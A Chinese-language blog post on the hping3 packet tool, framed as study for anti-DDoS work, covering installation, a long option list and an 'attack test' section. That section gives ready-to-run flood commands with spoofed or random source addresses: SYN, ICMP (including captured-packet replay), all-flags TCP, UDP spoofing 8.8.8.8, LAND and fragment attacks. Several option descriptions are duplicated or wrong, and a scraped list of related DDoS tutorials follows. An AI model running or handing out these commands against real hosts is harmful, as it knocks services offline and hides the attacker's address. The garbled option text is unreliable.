• Author:ZERO-A-ONE
  • Date:2021-02-15

​ 最近在研究Anti-DDoS势必要了解如何发起DDoS攻击,于是就接触到了hping3这款发包工具

一、简介

​ hping是面向命令行的用于生成和解析TCP/IP协议数据包汇编/分析的开源工具。作者是Salvatore Sanfilippo,界面灵感来自ping(8)unix命令,目前最新版是hping3,它支持TCP,UDP,ICMP和RAW-IP协议,具有跟踪路由模式,能够在覆盖的信道之间发送文件以及许多其他功能,支持使用tcl脚本自动化地调用其API。hping是安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测

二、安装

yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install

三、命令使用

命令语法:

$ hping3

选项含义:

-H --help 显示帮助。
-v -VERSION 版本信息。
-c --count count 发送数据包的次数 关于countreached_timeout 可以在hping2.h里编辑。
-i --interval 包发送间隔时间(单位是毫秒)缺省时间是1秒,此功能在增加传输率上很重要,在idle/spoofing扫描时此功能也会被用到,你可以参考hping-howto获得更多信息-fast 每秒发10个数据包。
-n -nmeric 数字输出,象征性输出主机地址。
-q -quiet 退出。
-I --interface interface name 无非就是eth0之类的参数。
-v --verbose 显示很多信息,TCP回应一般如:len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D --debug 进入debug模式当你遇到麻烦时,比如用HPING遇到一些不合你习惯的时候,你可以用此模式修改HPING,(INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.......)
-z --bind 快捷键的使用。
-Z --unbind 消除快捷键。
-O --rawip RAWIP模式,在此模式下HPING会发送带数据的IP头。
-1 --icmp ICMP模式,此模式下HPING会发送IGMP应答报,你可以用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。
-2 --udp UDP 模式,缺省下,HPING会发送UDP报文到主机的0端口,你可以用--baseport --destport --keep选项指定其模式。
-9 --listen signatuer hping的listen模式,用此模式,HPING会接收指定的数据。
-a --spoof hostname 伪造IP攻击,防火墙就不会记录你的真实IP了,当然回应的包你也接收不到了。
-t --ttl time to live 可以指定发出包的TTL值。
-H --ipproto 在RAW IP模式里选择IP协议。
-w --WINID UNIX ,WINDIWS的id回应不同的,这选项可以让你的ID回应和WINDOWS一样。
-r --rel 更改ID的,可以让ID曾递减输出,详见HPING-HOWTO。
-F --FRAG 更改包的FRAG,这可以测试对方对于包碎片的处理能力,缺省的“virtual mtu”是16字节。
-x --morefrag 此功能可以发送碎片使主机忙于恢复碎片而造成主机的拒绝服务。
-y -dontfrag 发送不可恢复的IP碎片,这可以让你了解更多的MTU PATH DISCOVERY。
-G --fragoff fragment offset value set the fragment offset
-m --mtu mtu value 用此项后ID数值变得很大,50000没指定此项时3000-20000左右。
-G --rroute 记录路由,可以看到详悉的数据等等,最多可以经过9个路由,即使主机屏蔽了ICMP报文。
-C --ICMPTYPE type 指定ICMP类型,缺省是ICMP echo REQUEST。
-K --ICMPCODE CODE 指定ICMP代号,缺省0。
--icmp-ipver 把IP版本也插入IP头。
--icmp-iphlen 设置IP头的长度,缺省为5(32字节)。
--icmp-iplen 设置IP包长度。
--icmp-ipid 设置ICMP报文IP头的ID,缺省是RANDOM。
--icmp-ipproto 设置协议的,缺省是TCP。
-icmp-cksum 设置校验和。
-icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)
--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)
-s --baseport source port hping 用源端口猜测回应的包,它从一个基本端口计数,每收一个包,端口也加1,这规则你可以自己定义。
-p --deskport [+][+]desk port 设置目标端口,缺省为0,一个加号设置为:每发送一个请求包到达后,端口加1,两个加号为:每发一个包,端口数加1。
--keep 上面说过了。
-w --win 发的大小和windows一样大,64BYTE。
-O --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.
-m --tcpseq 设置TCP序列数。
-l --tcpck 设置TCP ack。
-Q --seqnum 搜集序列号的,这对于你分析TCP序列号有很大作用。
-h –help 显示帮助
-v –version 显示版本
-c –count 数据包计数
-i –interval 等待 (uX即X微秒, 例如: -i u1000)
–fast 等同 -i u10000 (每秒10个包)
–faster 等同 -i u1000 (每秒100个包)
–flood 尽最快发送数据包,不显示回复。
-n –numeric 数字输出
-q –quiet 静默模式
-I –interface 接口名 (默认路由接口)
-V –verbose 详细模式
-D –debug 调试信息
-z –bind 绑定ctrl+z到ttl(默认为目的端口)
-Z –unbind 取消绑定ctrl+z键
–beep 对于接收到的每个匹配数据包蜂鸣声提示
-0 –rawip 原始IP模式
-1 –icmp ICMP模式
-2 –udp UDP模式
-8 –scan SCAN模式
-9 –listen listen模式
-a –spoof 伪造源地址
–rand-dest 随机目的地址模式。详细使用man命令
–rand-source 随机来源地址模式。详细使用man命令
-t –ttl ttl (默认64)
-N –id id (默认随机)
-W –winid 使用win* id字节顺序
-r –rel 相对id字段(估计主机流量)
-f –frag 拆分数据包更多的frag
-x –morefrag 设置更多的分段标志
-y –dontfrag 设置不分段标志
-g –fragoff 设置分段偏移
-m –mtu 设置虚拟最大传输单元
-o –tos 服务类型(默认为0x00),尝试–tos帮助
-G –rroute 包含RECORD_ROUTE选项并显示路由缓冲区
–lsrr 松散源路由并记录路由
–ssrr 严格源路由并记录路由
-H –ipproto 设置IP协议字段,仅在RAW IP模式下使用

四、攻击测试

3.1 SYN Flood

命令操作:

hping3 -c 100000 -d 120 -S -w 64 -p 21 --flood --rand-source www.xxx.com(IP)

参数含义:

  • hping3:应用名称
  • -c 100000:需要发送的包(packets)的数量(非必须)
  • -d 120:包(packets)的大小(非必须)
  • -S:只发送SYN packets
  • -w 64:TCP窗口(Windows)的大小(非必须)
  • -p 21:伪造包为21端口(可以为任意值)
  • –flood:尽可能快的利用全部系统资源发包,泛洪攻击模式
  • –rand-source:伪造随机的源IP地址,也可以使用-a伪造特定的IP地址
  • www.xxx.com(IP):需要攻击的目标主机域名或IP地址

3.2 ICMP Flood

命令操作:

$ hping3 -q -n -a 10.0.0.1 --id 0 --icmp -d 56 --flood 192.168.0.2

参数含义:

  • -q:静默模式(非必须)
  • -n:数字输出
  • -a 10.0.0.1:伪造源地址为10.0.0.1
  • –id 0:表示有ICMP回显(ICMP echo request也就是ping)
  • –icmp:ICMP模式
  • -d 56:目标端口56

在真实世界中的攻击环境中,到目前为止,很多系统配置中都会选择自动丢弃通过hping生成的头部设定不正确的ICMP包,面对这种情况我们可以不使用hping生成的数据包,而是真正的通过抓包软件获得正常的ICMP回显请求报文,然后使用hping3进行重播

命令操作:

$ hping3 -q -n --rawip -a 10.0.0.1 --ipproto 1 --file "./xxxx.bin" -d 64 --flood 192.168.0.2

参数含义:

  • -q:静默模式(非必须)
  • -n:数字输出
  • –rawip:RAWIP模式,在此模式下HPING会发送带数据的IP头
  • –ipproto:设置IP协议字段,仅在RAW IP模式下使用
  • –file:需要重放的文件地址

3.3 TCP Flood

命令操作:

$ hping3 -SARUPF -p 80 -–flood –rand-source 192.168.100.1

参数含义:

  • -SARUPF:

3.4 UDP Flood

命令操作:

$ hping3 –udp -s 6666 -p 53 -a 8.8.8.8 -–flood 192.168.100.1

参数含义:

  • -udp:UDP模式
  • -s:用源端口猜测回应的包,它从一个基本端口计数,每收一个包,端口也加1,这规则你可以自己定义

3.5 LAND攻击

命令操作:

$ hping3 -n -S -p 80 -a 192.168.100.1 -–flood 192.168.100.1

3.6 混合大小包攻击

命令操作:

$ time(hping3 --syn -d 1600 -x -m 600 --id 1020 -c 1 192.168.10.100 & hping3 --syn -d 1600 -x -m 400 --id 1020 -c 1 192.168.10.100)

hping3拒绝服务攻击小结相关推荐

  1. dos攻击命令_Kali Linux系列之拒绝服务攻击(DOS)实战(上)

    (你的世界是个什么样的世界?你说,我们倾听!) ----------------- 小百科 拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一.其实对网络带宽进行的消耗性攻击 ...

  2. 入侵防御之拒绝服务攻击

    是什么 DOS攻击(Denial-of-Service Attack),拒绝服务攻击,目的是破坏目标系统的可用性,使用目标网络或系统资源耗尽,使服务暂时中断或停止,导致其合法用户无法访问对服务干涉.其 ...

  3. 拒绝服务攻击(DOS和DDOS)

    简介: **DDoS:(Distributed Denial of Service)**攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高 ...

  4. DoS本地拒绝服务攻击

    拒绝服务攻击 拒绝服务攻击(Denial of Service)并非一种具体的攻击方式,针对信息安全的六大要求也并非机密性.完整性.访问控制或是身份验证,而是针对本世纪才进行重视的可用性.因为它通过系 ...

  5. 十五、Kali Linux 2 拒绝服务攻击

    拒绝服务攻击 拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一.其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分,只要能够对目标造成麻烦,使某些服务被暂停甚至主机死 ...

  6. 实验四 拒绝服务攻击

    实验目的 UDP Flood攻击练习 实验内容 实验环境:kali IP:192.168.91.129 1.hping3 1.1 hping3 -S -a 1.1.1.1 -V www.baidu.c ...

  7. Kali渗透测试:拒绝服务攻击

    Kali渗透测试:拒绝服务攻击 故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击.拒绝服务攻击是指攻击者想办法让目标停止提供服务,是黑客常用的攻击手段之一.其实对网络带 ...

  8. TCP拒绝服务攻击简述与实验

    一.TCP拒绝服务攻击简述 拒绝服务(DoS)攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一.其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分,只要能够对目标造成麻烦,使 ...

  9. 【网络与系统安全实验】拒绝服务攻击及防御

    [网络与系统安全实验]拒绝服务攻击及防御 拒绝服务攻击概述 拒绝服务攻击的概念 "拒绝服务"这个词来源于英文Denial of Service(简称DoS),它是一种简单的破坏性攻 ...

  10. Kali渗透-DDOS拒绝服务攻击

    前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 本文目的 演示如何借助 Kali Linux 系统内置的一个 TCP/IP 数据包组装/分析工具 hping 和在 Github 上开源的 ...

最新文章

  1. Windows server2008 搭建ASP接口访问连接oracle数据库全过程记录--备用
  2. 认识nio中buf的三个常用属性
  3. Android的开机流程及对应源码位置分析
  4. Linux环境下搭建Tomcat+mysql+jdk
  5. java persistence.xml_java – 找不到persistence.xml
  6. js读取excel中日期格式转换问题
  7. python爬取酷狗音乐_python 爬虫 爬取酷狗音乐
  8. ubuntu使用byzanz截取gif动态图
  9. 读《PROSOSPEECH: ENHANCING PROSODY WITH QUANTIZED VECTOR PRE-TRAINING IN TEXT-TO-SPEECH》
  10. k8s当中calico节点日志报错 confd/health.go 180: Number of node(s) with BGP peering established = 0
  11. iOS 战斗机跑车效果
  12. 指定IDEA的字符编码
  13. ENSP中PC机如何从DHCP服务器上自动获取固定的IP地址
  14. 网站都变成灰色的了,代码是怎么实现的呢?
  15. oppo手机便签存储路径在哪
  16. 聊聊如何才能学好编程
  17. CUMT2020算法上机测试(2020-11-11)
  18. 高项(信息系统项目管理师)考试很难?如何备考?
  19. S32ds使用笔记3_debug错误
  20. org.hibernate.PropertyAccessException: Exception occurred inside setter of 错误解释

热门文章

  1. rpgmakermv存档修改网站_NexT 网站配置——雏形初成
  2. nginx 映射ip端口服务
  3. Altium差分布线和等长方法
  4. 解锁网易云音乐客户端变灰歌曲的详细教程
  5. python三元一次方程代码_求三元一次方程计算器代码
  6. excel图表模板免费下载_40个免费的信息图表模板下载
  7. Web页面引入思源黑体
  8. 什么是BT1120协议
  9. win7西捷硬盘测试软件,Seagate希捷SeaTools硬盘检测工具
  10. win10 java8安装包双击之后完全没反应